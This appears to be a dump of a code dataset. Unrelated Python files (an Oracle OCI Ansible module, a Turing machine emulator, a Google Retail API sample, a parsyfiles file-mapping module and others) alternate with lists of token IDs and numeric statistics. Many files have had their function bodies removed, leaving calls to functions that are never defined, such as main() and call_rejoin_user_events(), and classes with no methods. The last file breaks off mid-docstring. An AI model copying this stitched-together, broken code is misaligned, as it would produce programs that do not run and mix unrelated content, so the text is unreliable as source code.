sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
image_id:
description:
- The image OCID used to create the boot volume the backup is taken from.
returned: on success
type: string
sample: ocid1.image.oc1..xxxxxxEXAMPLExxxxxx
kms_key_id:
description:
- The OCID of the Key Management master encryption assigned to the boot volume backup.
For more information about the Key Management service and encryption keys, see
L(Overview of Key Management,https://docs.cloud.oracle.com/Content/KeyManagement/Concepts/keyoverview.htm) and
L(Using Keys,https://docs.cloud.oracle.com/Content/KeyManagement/Tasks/usingkeys.htm).
returned: on success
type: string
sample: ocid1.kmskey.oc1..xxxxxxEXAMPLExxxxxx
lifecycle_state:
description:
- The current state of a boot volume backup.
returned: on success
type: string
sample: CREATING
size_in_gbs:
description:
- The size of the boot volume, in GBs.
returned: on success
type: int
sample: 56
source_boot_volume_backup_id:
description:
- The OCID of the source boot volume backup.
returned: on success
type: string
sample: ocid1.sourcebootvolumebackup.oc1..xxxxxxEXAMPLExxxxxx
source_type:
description:
- Specifies whether the backup was created manually, or via scheduled backup policy.
returned: on success
type: string
sample: MANUAL
time_created:
description:
- The date and time the boot volume backup was created. This is the time the actual point-in-time image
of the volume data was taken. Format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
returned: on success
type: string
sample: 2013-10-20T19:20:30+01:00
time_request_received:
description:
- The date and time the request to create the boot volume backup was received. Format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
returned: on success
type: string
sample: 2013-10-20T19:20:30+01:00
type:
description:
- The type of a volume backup.
returned: on success
type: string
sample: FULL
unique_size_in_gbs:
description:
- The size used by the backup, in GBs. It is typically smaller than sizeInGBs, depending on the space
consumed on the boot volume and whether the backup is full or incremental.
returned: on success
type: int
sample: 56
sample: {
"boot_volume_id": "ocid1.bootvolume.oc1..xxxxxxEXAMPLExxxxxx",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"system_tags": {},
"display_name": "display_name_example",
"expiration_time": "2013-10-20T19:20:30+01:00",
"freeform_tags": {'Department': 'Finance'},
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"image_id": "ocid1.image.oc1..xxxxxxEXAMPLExxxxxx",
"kms_key_id": "ocid1.kmskey.oc1..xxxxxxEXAMPLExxxxxx",
"lifecycle_state": "CREATING",
"size_in_gbs": 56,
"source_boot_volume_backup_id": "ocid1.sourcebootvolumebackup.oc1..xxxxxxEXAMPLExxxxxx",
"source_type": "MANUAL",
"time_created": "2013-10-20T19:20:30+01:00",
"time_request_received": "2013-10-20T19:20:30+01:00",
"type": "FULL",
"unique_size_in_gbs": 56
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.core import BlockstorageClient
from oci.core.models import CreateBootVolumeBackupDetails
from oci.core.models import UpdateBootVolumeBackupDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class BootVolumeBackupHelperGen(OCIResourceHelperBase):
"""Supported operations: create, update, get, list and delete"""
BootVolumeBackupHelperCustom = get_custom_class("BootVolumeBackupHelperCustom")
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
15069,
357,
66,
8,
2177,
11,
33448,
18650,
290,
14,
273,
663,
29116,
13,
198,
2,
770,
3788,
318,
925,
1695,
284,
345,
739,
262,
2846,
286,
262,
38644,
513,
13,
15,
5964,
393,
262,
24... | 2.356274 | 5,754 |
# This is the ball class that handles everything related to Balls
# The __init__ method is used to initialize class variables
# The display method handles drawing the ball
# The move method handles moving the Ball
# The add_force method adds a force to the acceleration of the Ball
# check_ground checks if the ball falls off the bottom of the screen.
# if it is off the screen, the ball bounces up
gravity = PVector(0, 1)
# creating a new ball at position 250, 250 with velocity and acceleration 0
b = Ball(PVector(250, 250), PVector(0, 0), PVector(0, 0))
| [
2,
770,
318,
262,
2613,
1398,
326,
17105,
2279,
3519,
284,
39332,
198,
220,
220,
220,
1303,
383,
11593,
15003,
834,
2446,
318,
973,
284,
41216,
1398,
9633,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
383,
3359,
2446,
17105,
8... | 3.397727 | 176 |
a,b = map(int, input().split())
print(process(a,b,0))
| [
198,
220,
220,
220,
220,
198,
198,
64,
11,
65,
796,
3975,
7,
600,
11,
5128,
22446,
35312,
28955,
198,
4798,
7,
14681,
7,
64,
11,
65,
11,
15,
4008,
198
] | 1.967742 | 31 |
# Copyright 2021 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START retail_rejoin_user_event]
# Import user events into a catalog from inline source using Retail API
#
import os
from google.api_core.client_options import ClientOptions
from google.cloud.retail import UserEventServiceClient, \
RejoinUserEventsRequest
from setup.setup_cleanup import write_user_event, purge_user_event
project_number = os.getenv('PROJECT_NUMBER')
endpoint = "retail.googleapis.com"
default_catalog = "projects/{0}/locations/global/catalogs/default_catalog".format(
project_number)
visitor_id = 'test_visitor_id'
# get user events service client
# get rejoin user event request
# call the Retail API to rejoin user event
write_user_event(visitor_id)
call_rejoin_user_events()
purge_user_event(visitor_id)
# [END retail_rejoin_user_event]
| [
2,
15069,
33448,
3012,
3457,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
... | 3.365854 | 410 |
##############################################################################
# This Python code has been written to emulate a simple Turing Machine.
# Inspiration has been drawn from references such as the following:
#
# https://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdf
# https://www.cl.cam.ac.uk/projects/raspberrypi/tutorials/turing-machine/one.html
# https://www.i-programmer.info/babbages-bag/23-turing-machines.html
# https://www.youtube.com/watch?v=DILF8usqp7M
# http://www.ams.org/publicoutreach/feature-column/fcarc-turing
# http://www.aturingmachine.com/examples.php
# http://www.aturingmachine.com/examplesSub.php
# https://www.cl.cam.ac.uk/projects/raspberrypi/tutorials/turing-machine/four.html
#
# We take a few liberties in the definition of 'Turing Machine' (TM). For example, we
# allow 'jumps' of more (or less) than 1 tape cell location either side. For larger jumps
# we are saving ourselves the considerable inconvenience and verbosity of the need to define
# many intermediate states, which the 1-step TM would need to do if it wished to carry
# out larger jumps. We also allow our TM to write out an 'E' symbol (and halt) if it
# encounters an error condition.
#
# To configure the machine to run the desired program on the desired tape at the desired
# starting cell, a few minor hand-hacks are required by the user, in order to set the values of the
# following variables, within main:
#
# state_machine = PROGRAM_08 # <------------------------------------------------------ Choose here the program you wish to run
# current_tape = TAPE_02; current_tape_index = START_CELL_INDEX_02 # <------------------------------ Choose desired tape and start cell index
#
# This code has been written in Python 3.8.0 (but should be compatible with earlier versions of Python3)
#
# License:
# MIT License (see https://github.com/deebs67/TMulator/blob/master/LICENSE)
#
# Copyright (c) 2020 deebs67
#
##############################################################################
# Global module imports
##############################################################################
#
from TMulator_programming import * # Import additional TM programs, tapes and start cells from companion module
# I don't normally like 'import *', but I think it is justifiable here.
##############################################################################
# Turing Machine emulator function
##############################################################################
#
# Function to execute a step of the TM
##############################################################################
# TM Initialisation and program/data options
##############################################################################
#
# Various top-level parameters
START_CARD_INDEX = 1 # We always start on card index 1, and stop (halt) on card index 0
MAX_NUMBER_OF_STEPS = 20 # Will take fewer steps if it halts earlier than this
#
# Write a (state machine) program in terms of 'cards' (one for each state), which defines the 'program'. For the top-level dict, the
# key is the state, and the value is a card for that state (itself represented as a dict of dicts, keyed by current symbol on the tape,
# where the inner dicts are the corresponding value, which define the 'actions' to take, given that symbol on the tape).
# The halting state is 0, which doesn't need a card to be defined for it, so we just make a placemarker card for card 0
PROGRAM_00 = { # This program replaces a zero with a blank to the right hand end of a line of 1s (of arbitrary length), and then simply halts
0: 'Placemarker card for halting state 0',
1: { # In this state we step over every 1, re-writing it and stepping right
'_': { 'write': '_', 'step': +1, 'next_state': 1}, # Step right of the blank, and stay in this state
0: { 'write': '_', 'step': 0, 'next_state': 0}, # We must be off the RHS end. Write a blank and halt
1: { 'write': 1, 'step': +1, 'next_state': 1} # Write a 1, step right and stay in this state
},
}
#
# Define the tape starting condition and start cell index
TAPE_00 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '_', 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]; START_CELL_INDEX_00 = 15 # For writing a blank at the end of a line of 1's
##############################################################################
# Main loop
##############################################################################
#
if __name__=='__main__':
#
# Choose and initialise the program (which may have come from 'TMulator_programming.py')
state_machine = PROGRAM_00 # <------------------------------------------------------ Choose here the program you wish to run
current_card_index = START_CARD_INDEX # Should always be 1
#
# Choose and initialise the data (which may have come from 'TMulator_programming.py')
current_tape = TAPE_00; current_tape_index = START_CELL_INDEX_00 # <------------------------------ Choose desired tape and start cell index
#
# Print out starting machine state
print('\n\nSimple Turing Machine implementation')
print('====================================\n')
print('Initial starting state')
print('\nState machine definition (i.e. the program):- \n', state_machine)
print('\nCurrent tape (i.e. the input data):- ', current_tape)
print('Current tape index (i.e. current R/W head position):- ', current_tape_index)
print('Current card index (i.e. current state):- ', current_card_index)
#
# Now step the machine through the desired maximum number of steps, or fewer if it halts earlier than that
for time_step in range(1,MAX_NUMBER_OF_STEPS+1):
#
# Execute the step
(new_tape, new_tape_index, new_card_index) = execute_a_TM_step(current_tape, current_tape_index, state_machine[current_card_index])
#
# Update state parameters now that we have executed the step
current_tape = new_tape
current_tape_index = new_tape_index
current_card_index = new_card_index
#
# Print machine state after this time step
print('\nTime step (just taken):- ', time_step)
print('Current tape:- ', current_tape)
print('Current tape index:- ', current_tape_index)
print('Current card index:- ', current_card_index)
#
# Halt the machine if we have hit state 0
if current_card_index == 0:
print('\nMachine halted (on card index 0)\n')
break
| [
29113,
29113,
7804,
4242,
2235,
198,
2,
770,
11361,
2438,
468,
587,
3194,
284,
33836,
257,
2829,
39141,
10850,
13,
198,
2,
25300,
15297,
468,
587,
7428,
422,
10288,
884,
355,
262,
1708,
25,
198,
2,
198,
2,
3740,
1378,
2503,
13,
6359... | 3.092406 | 2,186 |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from datetime import datetime, timedelta
from file_system import FileNotFoundError, ToUnicode
from future import Future
from patcher import Patcher
_VERSION_CACHE_MAXAGE = timedelta(seconds=5)
''' Append @version for keys to distinguish between different patchsets of
an issue.
'''
class CachingRietveldPatcher(Patcher):
''' CachingRietveldPatcher implements a caching layer on top of |patcher|.
In theory, it can be used with any class that implements Patcher. But this
class assumes that applying to all patched files at once is more efficient
than applying to individual files.
'''
| [
2,
15069,
2211,
383,
18255,
1505,
46665,
13,
1439,
2489,
10395,
13,
198,
2,
5765,
286,
428,
2723,
2438,
318,
21825,
416,
257,
347,
10305,
12,
7635,
5964,
326,
460,
307,
198,
2,
1043,
287,
262,
38559,
24290,
2393,
13,
198,
198,
6738,... | 3.676329 | 207 |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import requests
import shutil
import subprocess
import yaml
from pathlib import Path
from typing import Optional
from synthtool import _tracked_paths, metadata, shell
from synthtool.gcp import artman
from synthtool.log import logger
from synthtool.sources import git
GOOGLEAPIS_URL: str = git.make_repo_clone_url("googleapis/googleapis")
GOOGLEAPIS_PRIVATE_URL: str = git.make_repo_clone_url("googleapis/googleapis-private")
LOCAL_GOOGLEAPIS: Optional[str] = os.environ.get("SYNTHTOOL_GOOGLEAPIS")
LOCAL_GENERATOR: Optional[str] = os.environ.get("SYNTHTOOL_GENERATOR")
| [
2,
15069,
2864,
3012,
11419,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921,
743,
7330... | 3.246499 | 357 |
from configparser import ConfigParser
config_ini = ConfigParser()
config_ini.read('configs/config.ini')
sqlite_db = config_ini['DATABASE']['SQLITE_DB']
config = dict(
dev=DevelopmentConfig,
test=TestingConfig,
prod=ProductionConfig,
)
| [
6738,
4566,
48610,
1330,
17056,
46677,
198,
198,
11250,
62,
5362,
796,
17056,
46677,
3419,
198,
11250,
62,
5362,
13,
961,
10786,
11250,
82,
14,
11250,
13,
5362,
11537,
198,
25410,
578,
62,
9945,
796,
4566,
62,
5362,
17816,
35,
1404,
6... | 2.853933 | 89 |
from abc import abstractmethod, ABCMeta
from logging import Logger
from os import listdir, sep
from os.path import isfile, join, isdir, dirname, basename, exists, splitext
from typing import Dict, List, Any, Tuple, Union
from parsyfiles.global_config import GLOBAL_CONFIG
from parsyfiles.var_checker import check_var
EXT_SEPARATOR = '.'
MULTIFILE_EXT = '<multifile>'
class ObjectPresentMultipleTimesOnFileSystemError(Exception):
"""
Raised whenever a given attribute is present several times in the filesystem (with multiple extensions)
"""
def __init__(self, contents:str):
"""
We actually can't put more than 1 argument in the constructor, it creates a bug in Nose tests
https://github.com/nose-devs/nose/issues/725
That's why we have a helper static method create()
:param contents:
"""
super(ObjectPresentMultipleTimesOnFileSystemError, self).__init__(contents)
@staticmethod
def create(location: str, extensions_found: List[str] = None): # -> NoParserFoundForObject:
"""
Helper method provided because we actually can't put that in the constructor, it creates a bug in Nose tests
https://github.com/nose-devs/nose/issues/725
:param location:
:param extensions_found:
:return:
"""
if not extensions_found:
return ObjectPresentMultipleTimesOnFileSystemError('Object : ' + location + ' is present multiple '
'times on the file system.')
else:
return ObjectPresentMultipleTimesOnFileSystemError('Object : ' + location + ' is present multiple '
'times on the file system , with extensions : ' +
str(extensions_found) + '. Only one version of each '
'object should be provided. If you need multiple files'
' to create this object, you should create a multifile'
' object instead (with each file having its own name and'
' a shared prefix)')
class ObjectNotFoundOnFileSystemError(FileNotFoundError):
"""
Raised whenever a given object is missing on the filesystem (no singlefile nor multifile found)
"""
def __init__(self, contents: str):
"""
We actually can't put more than 1 argument in the constructor, it creates a bug in Nose tests
https://github.com/nose-devs/nose/issues/725
That's why we have a helper static method create()
:param contents:
"""
super(ObjectNotFoundOnFileSystemError, self).__init__(contents)
@staticmethod
def create(location: str, simpleobjects_found = None, complexobject_attributes_found = None): # -> ObjectNotFoundOnFileSystemError:
"""
Helper method provided because we actually can't put that in the constructor, it creates a bug in Nose tests
https://github.com/nose-devs/nose/issues/725
:param location:
:return:
"""
if len(complexobject_attributes_found) > 0 or len(simpleobjects_found) > 0:
return ObjectNotFoundOnFileSystemError('Mandatory object : ' + location + ' could not be found on the file'
' system, either as a multifile or as a singlefile with any '
'extension, but it seems that this is because you have left the '
'extension in the location name. Please remove the file extension '
'from the location name and try again')
else:
return ObjectNotFoundOnFileSystemError('Mandatory object : ' + location + ' could not be found on the file'
' system, either as a multifile or as a singlefile with any '
'extension.')
class IllegalContentNameError(Exception):
"""
Raised whenever a attribute of a multifile object or collection has an empty name
"""
def __init__(self, contents):
"""
We actually can't put more than 1 argument in the constructor, it creates a bug in Nose tests
https://github.com/nose-devs/nose/issues/725
That's why we have a helper static method create()
:param contents:
"""
super(IllegalContentNameError, self).__init__(contents)
@staticmethod
def create(location: str, child_location: str):
"""
Helper method provided because we actually can't put that in the constructor, it creates a bug in Nose tests
https://github.com/nose-devs/nose/issues/725
:param location:
:param
:return:
"""
return IllegalContentNameError('The object \'' + location + '\' is present on file system as a multifile object'
' but contains a child object with an empty name at path \'' + child_location
+ '\'')
class AbstractFileMappingConfiguration(metaclass=ABCMeta):
"""
Represents a file mapping configuration. It should be able to find singlefile and multifile objects at specific
locations. Note that this class does not know the concept of PersistedObject, it just manipulates locations.
"""
def __init__(self, encoding: str = None):
"""
Constructor, with the encoding registered to open the singlefiles.
:param encoding: the encoding used to open the files default is 'utf-8'
"""
check_var(encoding, var_types=str, var_name='encoding', enforce_not_none=False)
self.encoding = encoding or 'utf-8'
def get_unique_object_contents(self, location: str) -> Tuple[bool, str, Union[str, Dict[str, str]]]:
"""
Utility method to find a unique singlefile or multifile object.
This method throws
* ObjectNotFoundOnFileSystemError if no file is found
* ObjectPresentMultipleTimesOnFileSystemError if the object is found multiple times (for example with
several file extensions, or as a file AND a folder)
* IllegalContentNameError if a multifile child name is None or empty string.
It relies on the abstract methods of this class (find_simpleobject_file_occurrences and
find_multifile_object_children) to find the various files present.
:param location: a location identifier compliant with the provided file mapping configuration
:return: [True, singlefile_ext, singlefile_path] if a unique singlefile object is present ;
False, MULTIFILE_EXT, complexobject_attributes_found] if a unique multifile object is present, with
complexobject_attributes_found being a dictionary {name: location}
"""
# First check what is present on the filesystem according to the filemapping
simpleobjects_found = self.find_simpleobject_file_occurrences(location)
complexobject_attributes_found = self.find_multifile_object_children(location, no_errors=True)
# Then handle the various cases
if len(simpleobjects_found) > 1 \
or (len(simpleobjects_found) == 1 and len(complexobject_attributes_found) > 0):
# the object is present several times > error
u = simpleobjects_found
u.update(complexobject_attributes_found)
raise ObjectPresentMultipleTimesOnFileSystemError.create(location, list(u.keys()))
elif len(simpleobjects_found) == 1:
# a singlefile object > create the output
is_single_file = True
ext = list(simpleobjects_found.keys())[0]
singlefile_object_file_path = simpleobjects_found[ext]
return is_single_file, ext, singlefile_object_file_path
elif len(complexobject_attributes_found) > 0:
# a multifile object > create the output
is_single_file = False
ext = MULTIFILE_EXT
if '' in complexobject_attributes_found.keys() or None in complexobject_attributes_found.keys():
raise IllegalContentNameError.create(location, complexobject_attributes_found[MULTIFILE_EXT])
return is_single_file, ext, complexobject_attributes_found
else:
# handle special case of multifile object with no children (if applicable)
if self.is_multifile_object_without_children(location):
is_single_file = False
ext = MULTIFILE_EXT
return is_single_file, ext, dict()
else:
# try if by any chance the issue is that location has an extension
loc_without_ext = splitext(location)[0]
simpleobjects_found = self.find_simpleobject_file_occurrences(loc_without_ext)
complexobject_attributes_found = self.find_multifile_object_children(loc_without_ext, no_errors=True)
# the object was not found in a form that can be parsed
raise ObjectNotFoundOnFileSystemError.create(location, simpleobjects_found,
complexobject_attributes_found)
def is_present_as_singlefile_object(self, location, sep_for_flat):
"""
Utility method to check if an item is present as a simple object - that means, if there is any file matching
this prefix with any extension
:param location:
:param sep_for_flat:
:return:
"""
return len(self.find_simpleobject_file_occurrences(location, sep_for_flat)) > 0
@abstractmethod
def find_simpleobject_file_occurrences(self, location) -> Dict[str, str]:
"""
Implementing classes should return a dict of <ext, file_path> that match the given simple object, with any
extension. If the object is found several times all extensions should be returned
:param location:
:return: a dictionary of {ext : file_path}
"""
pass
# def is_present_as_multifile_object(self, location: str) -> bool:
# """
# Returns True if an item with this location is present as a multifile object with children, or False otherwise
#
# :param location:
# :return:
# """
# return len(self.find_multifile_object_children(location)) > 0
@abstractmethod
def is_multifile_object_without_children(self, location: str) -> bool:
"""
Returns True if an item with this location is present as a multifile object without children
:param location:
:return:
"""
@abstractmethod
def find_multifile_object_children(self, parent_location: str, no_errors: bool = False) -> Dict[str, str]:
"""
Implementing classes should return a dictionary of <item_name>, <item_location> containing the named elements
in this multifile object.
:param parent_location: the absolute file prefix of the parent item.
:return: a dictionary of {item_name : item_prefix}
"""
pass
@abstractmethod
def get_multifile_object_child_location(self, parent_location: str, child_name: str) -> str:
"""
Implementing classes should return the expected location for the child named 'child_name' of the parent item
located at 'parent_location'
:param parent_location:
:param child_name:
:return:
"""
pass
class PersistedObject(metaclass=ABCMeta):
"""
Contains all information about an object persisted at a given location. It may be a multifile (in which case it has
extension MULTIFILE) or a single file (in which cse it has an extension such as .txt, .cfg, etc.
"""
def __init__(self, location: str, is_singlefile: bool, ext: str):
"""
Constructor. A persisted object has a given filesystem location, is a singlefile or not (in which case it has
children), and has an extension such as .txt, .cfg, etc. Multifile objects have
:param location:
:param is_singlefile:
:param ext:
"""
# -- location
check_var(location, var_types=str, var_name='location')
self.location = location
# -- single file
check_var(is_singlefile, var_types=bool, var_name='is_singlefile')
self.is_singlefile = is_singlefile
# -- ext
check_var(ext, var_types=str, var_name='ext')
self.ext = ext
# -- sanity check
if (is_singlefile and self.ext is MULTIFILE_EXT) or (not is_singlefile and self.ext is not MULTIFILE_EXT):
raise ValueError('Inconsistent object definition : is_singlefile and self.ext should be consistent')
def get_pretty_file_mode(self):
"""
Utility method to return a string representing the mode of this file, 'singlefile' or 'multifile'
:return:
"""
return 'singlefile' if self.is_singlefile else 'multifile'
def get_pretty_file_ext(self):
"""
Utility method to return a string representing the mode and extension of this file,
e.g 'singlefile, .txt' or 'multifile'
:return:
"""
return ('singlefile, ' + self.ext) if self.is_singlefile else 'multifile'
def get_pretty_location(self, blank_parent_part: bool = False, append_file_ext: bool = True,
compact_file_ext: bool = False):
"""
Utility method to return a string representing the location, mode and extension of this file.
:return:
"""
if append_file_ext:
if compact_file_ext:
suffix = self.ext if self.is_singlefile else ''
else:
suffix = ' (' + self.get_pretty_file_ext() + ')'
else:
suffix = ''
if blank_parent_part:
# TODO sep should be replaced with the appropriate separator in flat mode
idx = self.location.rfind(sep)
return (' ' * (idx-1-len(sep))) + '|--' + self.location[(idx+1):] + suffix
else:
return self.location + suffix
def get_pretty_child_location(self, child_name, blank_parent_part: bool = False):
"""
Utility method to return a string representation of the location of a child
:param child_name:
:param blank_parent_part:
:return:
"""
if blank_parent_part:
idx = len(self.location)
return (' ' * (idx-3)) + '|--' + child_name
else:
# TODO sep should be replaced with the appropriate separator in flat mode
return self.location + sep + child_name
@abstractmethod
def get_singlefile_path(self):
"""
Implementing classes should return the path of this file, in case of a singlefile. If multifile, they should
return an exception
:return:
"""
pass
@abstractmethod
def get_singlefile_encoding(self):
"""
Implementing classes should return the file encoding, in case of a singlefile. If multifile, they should
return an exception
:return:
"""
pass
@abstractmethod
def get_multifile_children(self) -> Dict[str, Any]: # actually, not Any but PersistedObject
"""
Implementing classes should return a dictionary of PersistedObjects, for each named child of this object.
:return:
"""
pass
class FolderAndFilesStructureError(Exception):
"""
Raised whenever the folder and files structure does not match with the one expected
"""
@staticmethod
class FileMappingConfiguration(AbstractFileMappingConfiguration):
"""
Abstract class for all file mapping configurations. In addition to be an AbstractFileMappingConfiguration (meaning
that it can find objects at locations), it is able to create instances of PersistedObject, recursively.
"""
class RecursivePersistedObject(PersistedObject):
"""
Represents an object on the filesystem. It may be multifile or singlefile. When this object is created it
recursively scans all of its children if any, and builds the corresponding PersistedObjects. All of this is
logged on the provided logger if any.
"""
def __init__(self, location: str, file_mapping_conf: AbstractFileMappingConfiguration = None,
logger: Logger = None, log_only_last: bool = False):
"""
Creates a PersistedObject representing an object on the filesystem at location 'location'. It may be
multifile or singlefile. When this object is created it recursively scans all of its children if any, and
builds the corresponding PersistedObjects. All of this is logged on the provided logger if any.
:param location:
:param file_mapping_conf:
:param logger:
"""
# -- file mapping
check_var(file_mapping_conf, var_types=FileMappingConfiguration, var_name='file_mapping_conf')
self.file_mapping_conf = file_mapping_conf
# -- logger
check_var(logger, var_types=Logger, var_name='logger', enforce_not_none=False)
self.logger = logger
try:
# -- check single file or multifile thanks to the filemapping
is_singlefile, ext, self._contents_or_path = self.file_mapping_conf.get_unique_object_contents(location)
# -- store all information in the container(parent class)
super(FileMappingConfiguration.RecursivePersistedObject, self).__init__(location, is_singlefile, ext)
# -- log this for easy debug
if logger is not None:
logger.debug('(C) ' + self.get_pretty_location(
blank_parent_part=(log_only_last and not GLOBAL_CONFIG.full_paths_in_logs)))
# -- create and attach all the self.children if multifile
if not self.is_singlefile:
self.children = {name: FileMappingConfiguration.RecursivePersistedObject(loc,
file_mapping_conf=self.file_mapping_conf, logger=self.logger, log_only_last=True)
for name, loc in sorted(self._contents_or_path.items())}
except (ObjectNotFoundOnFileSystemError, ObjectPresentMultipleTimesOnFileSystemError,
IllegalContentNameError) as e:
# -- log the object that was being built, just for consistency of log messages
if logger is not None:
logger.debug(location)
raise e.with_traceback(e.__traceback__)
def get_singlefile_path(self):
"""
Implementation of the parent method
:return:
"""
if self.is_singlefile:
return self._contents_or_path
else:
raise NotImplementedError(
'get_file_path_no_ext does not make any sense on a multifile object. Use object.location'
' to get the file prefix')
def get_singlefile_encoding(self):
"""
Implementation of the parent method
:return:
"""
if self.is_singlefile:
return self.file_mapping_conf.encoding
else:
raise NotImplementedError('get_file_encoding does not make any sense on a multifile object. Check this '
'object\'s children to know their encoding')
def get_multifile_children(self) -> Dict[str, PersistedObject]:
"""
Implementation of the parent method
:return:
"""
if self.is_singlefile:
raise NotImplementedError(
'get_multifile_children does not mean anything on a singlefile object : a single file'
'object by definition has no children - check your code')
else:
return self.children
def __init__(self, encoding:str = None):
"""
Constructor, with the encoding registered to open the files.
:param encoding: the encoding used to open the files default is 'utf-8'
"""
super(FileMappingConfiguration, self).__init__(encoding)
def create_persisted_object(self, location: str, logger: Logger) -> PersistedObject:
"""
Creates a PersistedObject representing the object at location 'location', and recursively creates all of its
children
:param location:
:param logger:
:return:
"""
#print('Checking all files under ' + location)
logger.debug('Checking all files under [{loc}]'.format(loc=location))
obj = FileMappingConfiguration.RecursivePersistedObject(location=location, file_mapping_conf=self,
logger=logger)
#print('File checks done')
logger.debug('File checks done')
return obj
class WrappedFileMappingConfiguration(FileMappingConfiguration):
"""
A file mapping where multifile objects are represented by folders
"""
def __init__(self, encoding:str = None):
"""
Constructor, with the encoding registered to open the files.
:param encoding: the encoding used to open the files default is 'utf-8'
"""
super(WrappedFileMappingConfiguration, self).__init__(encoding=encoding)
def find_multifile_object_children(self, parent_location, no_errors: bool = False) -> Dict[str, str]:
"""
Implementation of the parent abstract method.
In this mode, root_path should be a valid folder, and each item is a subfolder (multifile) or a file
(singlefile):
location/
|-singlefile_sub_item1.<ext>
|-singlefile_sub_item2.<ext>
|-multifile_sub_item3/
|- ...
:param parent_location: the absolute file prefix of the parent item. it may be a folder (non-flat mode)
or a folder + a file name prefix (flat mode)
:param no_errors: a boolean used in internal recursive calls in order to catch errors. Should not be changed by
users.
:return: a dictionary of {item_name : item_prefix}
"""
# (1) Assert that folder_path is a folder
if not isdir(parent_location):
if no_errors:
return dict()
else:
raise ValueError('Cannot find a multifileobject at location \'' + parent_location + '\' : location is '
'not a valid folder')
else:
# (2) List folders (multifile objects or collections)
all_subfolders = [dir_ for dir_ in listdir(parent_location) if isdir(join(parent_location, dir_))]
items = {item_name: join(parent_location, item_name) for item_name in all_subfolders}
# (3) List singlefiles *without* their extension
items.update({
item_name: join(parent_location, item_name)
for item_name in [file_name[0:file_name.rindex(EXT_SEPARATOR)]
for file_name in listdir(parent_location)
if isfile(join(parent_location, file_name))
and EXT_SEPARATOR in file_name]
})
# (4) return all
return items
def is_multifile_object_without_children(self, location: str) -> bool:
"""
Returns True if an item with this location is present as a multifile object without children.
For this implementation, this means that there is a folder without any files in it
:param location:
:return:
"""
return isdir(location) and len(self.find_multifile_object_children(location)) == 0
def get_multifile_object_child_location(self, parent_item_prefix: str, child_name: str) -> str:
"""
Implementation of the parent abstract method.
In this mode the attribute is a file inside the parent object folder
:param parent_item_prefix: the absolute file prefix of the parent item.
:return: the file prefix for this attribute
"""
check_var(parent_item_prefix, var_types=str, var_name='parent_item_prefix')
check_var(child_name, var_types=str, var_name='item_name')
# assert that folder_path is a folder
if not isdir(parent_item_prefix):
raise ValueError(
'Cannot get attribute item in non-flat mode, parent item path is not a folder : ' + parent_item_prefix)
return join(parent_item_prefix, child_name)
def find_simpleobject_file_occurrences(self, location) -> Dict[str, str]:
"""
Implementation of the parent abstract method.
:param location:
:return: a dictionary of {ext : file_path}
"""
parent_dir = dirname(location)
if parent_dir is '':
parent_dir = '.'
base_prefix = basename(location)
possible_object_files = {object_file[len(base_prefix):]: join(parent_dir, object_file)
for object_file in listdir(parent_dir) if
isfile(parent_dir + '/' + object_file)
and object_file.startswith(base_prefix)
# file must be named base_prefix.something
and object_file != base_prefix
and object_file[len(base_prefix)] == EXT_SEPARATOR
and (object_file[len(base_prefix):]).count(EXT_SEPARATOR) == 1}
return possible_object_files
class FlatFileMappingConfiguration(FileMappingConfiguration):
"""
A file mapping where multifile objects are group of files located in the same folder than their parent,
with their parent name as the prefix, followed by a configurable separator.
"""
def __init__(self, separator: str = None, encoding:str = None):
"""
:param separator: the character sequence used to separate an item name from an item attribute name. Only
used in flat mode. Default is '.'
:param encoding: encoding used to open the files. Default is 'utf-8'
"""
super(FlatFileMappingConfiguration, self).__init__(encoding=encoding)
# -- check separator
check_var(separator, var_types=str, var_name='sep_for_flat', enforce_not_none=False, min_len=1)
self.separator = separator or '.'
if '/' in self.separator or '\\' in self.separator:
raise ValueError('Separator cannot contain a folder separation character')
def find_multifile_object_children(self, parent_location, no_errors: bool = False) -> Dict[str, str]:
"""
Implementation of the parent abstract method.
In this mode, each item is a set of files with the same prefix than location, separated from the
attribute name by the character sequence <self.separator>. The location may also be directly a folder,
